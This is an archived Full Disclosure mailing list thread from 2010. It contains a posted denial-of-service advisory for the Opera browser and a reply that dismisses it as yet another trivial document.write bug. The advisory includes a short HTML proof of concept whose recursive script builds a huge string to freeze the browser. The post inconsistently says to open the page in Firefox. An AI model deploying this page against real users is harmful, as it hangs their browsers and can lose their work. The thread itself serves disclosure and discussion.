|
Full Disclosure
mailing list archives
Re: Opera (plenitude String )Denial of Service Exploit
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Wed, 3 Mar 2010 22:05:22 +1100
You get a life.
Fixed.
2010/3/3 information security <informationhacker08 () gmail com>
Thanks .Jeff for all your comment
so how to fix that
On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwillis30 () gmail com>wrote:
You gotta be joking, this is probably the 3000th DoS "advisory" for
document.write.
Guess what sparky, even Jeremy Brown didn't post that one.
Thus no surprise exploit-db post this kind of shit.
2010/3/3 information security <informationhacker08 () gmail com>
======================================================================
Opera (plenitude String )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08 () gmail com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download http://www.opera.com/download/
#Background
Opera is a popular internet browser :)
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
========================================================================================================================
asheesh.html
========================================================================================================================
<html>
<title>asheesh kumar mani tripathi</title>
Asheesh kumar Mani Tripathi
<head>
<script>
function asheesh ()
{
var i , anaconda = "XXXX"
for(i=24;i >0 ;--i)
{
anaconda=anaconda+anaconda;
}
document.write(anaconda);
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
========================================================================================================================
Why do you worry without cause? Whom do you fear without reason? Who can kill you?
The soul is neither born, nor does it die.
#If you have any questions, comments, or concerns, feel free to contact me.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
|
